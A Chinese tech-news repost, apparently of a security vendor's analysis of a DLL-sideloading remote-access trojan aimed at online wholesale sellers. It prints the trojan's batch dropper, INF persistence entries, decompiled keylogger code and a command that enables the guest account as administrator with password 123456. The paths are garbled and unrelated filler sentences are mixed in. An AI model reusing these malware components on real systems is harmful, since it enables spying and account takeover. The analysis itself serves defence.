南宁信息港
汽车
当前位置:首页 > 汽车

远控木马巧设白加黑陷阱瞄准店批发商牟取钱iyiou.com

发布时间:2019-03-11 17:22:22 编辑:笔名

远控木马巧设“白加黑”陷阱:瞄准店批发商牟取钱财

前言

近日,360安全中心监测到有不法分子通过添加好友的形式,以沟通商品交易的名义发送名为这几天团队的量的文件,一旦接收并打开文件,电脑将被远程控制,不法分子可进一步盗取隐私及财物、甚至植入病毒实现敲诈勒索等操作。

360安全中心对该样本进行分析发现,这几天团队的量.rar是一个将木马打包在其中的压缩包文件,投递目标主要是络批发商。牧马人通过将木马伪装成数量详情图片文件,在与商家沟通的期间,发送木马文件给商家,引诱商家中招。

当店批发商在接受到文件后,解压出文件夹并点击了文件夹中的宝贝批发数量.com后,木马就会在后台偷偷跑起来。

图0:解压后文件夹内容

文件夹结构

┌─ 宝贝批发数量.com

├─ i

└─ Data

├─ g

├─ 360666

│ ├─ G

│ ├─ date

│ ├─ e

│ ├─ t

│ ├─ TEMA

│ ├─ WPS_k

│ └─ WPS_k

└─ Order

├─ e

├─ e

└─ G

分析

宝贝批发数量.com

该文件其实为白文件,它带有艾威梯科技(北京)有限公司数字签名。

图1:白文件 签名信息

程序在执行起来后会读取同目录下的i文件,根据配置文件中Install项里的CmdLine执行命令。而文件常规打开是一堆乱码,在十六进制试图下可以清楚看到Cmdline命令。

图2:记事本浏览视图

图3:十六进制浏览视图

Cmdline命令如下:

[Install]

CmdLine=e execmd e /c e ` G

e

被宝贝批发数量.com加载起来的e,实质上是命令行工具Nircmd。而上述的命令语句则是通过execmd这个执行命令指示符,在不显示任何信息至屏幕的情况下执行下面的语句:

e /c e ` G

e

系统的cmd程序,它的作用是用于加载G这个批处理文件。

G

从文件名上来看它是一个图片,但内容为批处理脚本。内容如下:

图4:G

@echo off

e /c start g

md c:microsoft

copy t c:t

copy Data360666date c:microsoftdate

copy G c:G

copy e c:e

copy /b Data360666TEMA+ Data360666WPS_k+Data360666WPS_k c:l

start C:e

start c:windowssystem32 e l,LaunchINFSection c:g,DefaultInstall

pause

行为分析:

1. 打开Data目录下的g图片

2. 创建目录 c:microsoft目录

3. 拷贝Data360666目录下的t、date、G、e到c:microsoft目录中

4. 合并Data360666目录下的TEMA、WPS_k、WPS_k为c:microsoft目录下l

5. 执行C:e

6. 执行c:windowssystem32 e l,LaunchINFSection c:g,DefaultInstall

步骤1的目的是为了让批发商觉得自己真的是打开了一张图片

图5:数量图

步骤为白加黑木马部分

e是带有腾讯签名的白文件,由于e在调用l时,没有对l进行校验。牧马人通过将恶意文件拆分成TEMA、WPS_k、WPS_k三个文件,在程序执行过程中合并成l。当e执行的时候,恶意的l就会被自动加载,从而执行恶意代码。

l 步骤6的目的是通过g中的配置信息让e能够在重启后自启动,达到木马驻留受害者电脑的目的。

[Version]

Signature="$Windows NT$"

[Defaultinstall]

addREG=Gc

[Gc]

HKCU,"SoftwareMicrosoftWindows NTCurrentVersionWinlogon","shell","0x","e,C:e"

l

InitBugReport :

a. 通过访问www[.]baidu[.]com测试络连通性,如果访问失败则ExitProcess。

图6:测试络连通性

b. 导出函数为空,伪造源文件导出函数SetBugReportUin、ValidateBugReport。

void __cdecl TXBugReport::SetBugReportUin()

{

sub_10001F44();

}

void sub_10001F44()

{

;

}

void __cdecl TXBugReport::ValidateBugReport()

{

sub_10001F4B();

}

void sub_10001F4B()

{

;

}

c. 解密t,解密后的Readme_dump文件为PeLoad。它负责读取解密同目录下的date文件,并创建新的线程执行解密后的date。

图7:创建线程

Readme_dump(解密后的t)

a. 干扰函数

void Sleeps()

{

Sleep(0);

Sleep(0);

Sleep(0);

Sleep(0);

Sleep(0);

Sleep(0);

Sleep(0);

Sleep(0);

Sleep(0);

Sleep(0);

Sleep(0);

Sleep(0);

Sleep(0);

Sleep(0);

Sleep(0);

Sleep(0);

Sleep(0);

Sleep(0);

Sleep(0);

Sleep(0);

}

b. 解密date文件。

图8:解密算法

c. 读取解密同目录下的date文件,并创建新的线程执行解密后的date。

图9:加载木马

木马主体(解密后的date)

我们不要总希冀轰轰烈烈的幸福

a. 判断C:ProgramDataMicrosoftWindowsStart k文件是否存在,存在则删除文件。

b. 通过加密字符串T1hEVVFMWFNEVhVfVlsr解密出CC。

图10:解密CC地址

c. 络通讯

图11:连接CC

d. 键盘记录,通过异或0x62加密后保存到C:y。

while ( 1 )

{

v2 = GetKeyState(16); // 获取shift键状态

v3 = dword_BCEAF4[v8 / 4];

if ( ((unsigned __int16)GetAsyncKeyState(dword_BCEAF4[v8 / 4]) 8) 0x80 ) // 获取指定按键状态

{

if ( GetKeyState(20) v2 -1 v3 64 v3 93 )

{

*(v5 + v3) = 1;

}

else

{

if ( !GetKeyState(20) )

goto LABEL_38;

if ( v2 = 0 )

goto LABEL_22;

if ( v3 64 v3 93 )

{

*(v5 + v3) = 2;

}

else

{

LABEL_38:

if ( v2 = 0 )

{

LABEL_22:

*(v5 + v3) = 4;

goto LABEL_34;

}

*(v5 + v3) = 3;

}

图12:保存键盘记录

e. 清除事件日志

图13:清除事件日志

f. 遍历进程,检测杀软

图14:杀软字符串

图15:遍历进程

g.设置guest 密码,并添加到管理员组。

net user guest /active:yes net user guest 123456 net localgroup administrators guest /add

h. 其余功能主要还有文件管理、注册表管理、进程管理、shell操作、下载文件、更新客户端、卸载客户端等

追溯

根据CC地址p的域名信息获取到了域名持有者的姓名、邮箱、号。

图16:whois信息

年关将近,不法分子试图利用这些白加黑远控木马从中招用户那谋财。目前,360安全卫士已经对该类木马进行防御及查杀,在此也提醒民,提防来历不明的文件、链接,同时开启安全软件,临近新年,为自己的隐私及财产安全加上一把锁。

关注ITBear科技资讯公众号(itbear365 ),每天推送你感兴趣的科技内容。

声明:本文仅为传递更多络信息,不代表ITBear观点和意见,仅供参考了解,更不能作为投资使用依据。

广州大健康
ofo_ofo小黄车|ofo押金
2015年鄂尔多斯会务Pre-B轮企业